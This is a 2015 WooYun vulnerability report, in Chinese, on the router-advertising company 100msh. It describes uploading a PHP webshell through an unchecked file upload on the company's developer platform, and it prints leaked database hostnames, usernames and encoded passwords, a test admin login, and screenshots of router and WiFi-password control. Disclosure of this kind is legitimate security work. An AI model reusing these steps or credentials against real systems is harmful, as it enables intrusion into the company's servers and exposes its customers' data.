当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0107532

漏洞标题:看我是如何控制数万台路由器WiFi及广告的

相关厂商:深圳市百米生活电子商务有限公司

漏洞作者: Ch丶0nly

提交时间:2015-04-13 09:17

修复时间:2015-05-28 09:18

公开时间:2015-05-28 09:18

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-13: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

百米生活,通过免费商业Wi-Fi的铺设,在全国各城市打造一个基于本地化社区的电子商务服务平台,
为商家提供产品推广、品牌宣传、商家管理及成本控制等服务;为消费者带来社区附近衣食住行、吃喝玩乐的信息服务,同时借助免费Wi-Fi技术支持,开启移动互联网的全新生活方式。

详细说明:

百米生活,通过免费商业Wi-Fi的铺设,在全国各城市打造一个基于本地化社区的电子商务服务平台,
为商家提供产品推广、品牌宣传、商家管理及成本控制等服务;为消费者带来社区附近衣食住行、吃喝玩乐的信息服务,同时借助免费Wi-Fi技术支持,开启移动互联网的全新生活方式。
据资料显示 该公司的百米生活路由器已经遍布全国多个省市了,用户多达数十万!
不可否认这是全国最NB的一个(广告路由器) 说实话他这个路由器穿透力确实够NB
赞一个 就是广告太多了
一切起因皆因贵公司的广告 特么的深深的打动了我 才有了今天的故事
废话就不多说了 直接上漏洞证明

漏洞证明:

官网www.100msh.com
漏洞出现在http://open.100msh.com 开发者平台存在任意文件上传
首先我们先注册用户
http://open.100msh.com/user/register_dev.html
此处填写信息
写完之后来到我们的个人资料-上传我们的php一句话

1.jpg


点击提交 会提交请上传jpg文件 这个不管他 返回页面的时候我们的一句话已经上传了

http://img.100msh.net//developer/credential_file/12e31512040936467884.php

1.jpg


我们的php一句话已经执行

1.jpg


让人激动不已 里面有主站以及多个分站 开发站点等 重要信息及站点
附部分数据库信息:

//管理后台数据库链接		
'ADM' => array(
'DB_HOST' => 'db.100msh.com', //数据库主机
'DB_USER' => '100msh_admin', //数据库用户名
'DB_PWD' => '638m2rh5Hd9cUc2xDjW3Ig==', //数据库密码
'DB_NAME' => '100msh_admin', //数据库名
$db_cfg=array(
//商家管理数据库链接
'PARTNER'=>array(
'DB_HOST'=>'db.100msh.com', //数据库主机
'DB_USER'=>'100msh_partner', //数据库用户名
'DB_PWD'=>'g7COkNYlex98kGf4d8peoA==', //数据库密码
'DB_NAME'=>'100msh_partner', //数据库名
),
//前台商城数据库链接
'ADM'=>array(
'DB_HOST'=>'db.100msh.com', //数据库主机
'DB_USER'=>'100msh_admin', //数据库用户名
'DB_PWD'=>'638m2rh5Hd9cUc2xDjW3Ig==', //数据库密码
'DB_NAME'=>'100msh_admin', //数据库名
),
//商品数据库链接
'ITEM'=>array(
'DB_HOST'=>'db.100msh.com', //数据库主机
'DB_USER'=>'100msh_items', //数据库用户名
'DB_PWD'=>'VL9vDsx3ob/+9m4QhkUu5w==', //数据库密码
'DB_NAME'=>'100msh_items', //数据库名
),
'MACADMIN'=>array(
'DB_HOST'=>'db.100msh.com', //数据库主机
'DB_USER'=>'100msh_macadmin', //数据库用户名
'DB_PWD'=>'FGCy3cDZ4W0wUH2gEtkgcA==', //数据库密码
'DB_NAME'=>'100msh_macadmin', //数据库名
),
'DEVE'=>array(
'DB_HOST'=>'db.100msh.com', //数据库主机
'DB_USER'=>'100msh_developer', //数据库用户名
'DB_PWD'=>'pjROJdD6R31dN27KK0DtSg==', //数据库密码
'DB_NAME'=>'100msh_developer', //数据库名
),
);


找到多个数据库配置信息 其中就有我们的路由器管理后台,里面有数万名百米生活路由器用户的配置信息以及联系方式
http://wifiadmintest.100msh.com/
z_test
admintest
14万商户信息及联系方式

1.jpg


路由器信息及WIFI密码

1.jpg


此处可修改、清除WiFi上网密码

1.jpg


2.jpg


此处还可以修改、删除路由器广告

1.jpg


简单证明 就不做测试了

修复方案:

版权声明:转载请注明来源 Ch丶0nly@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)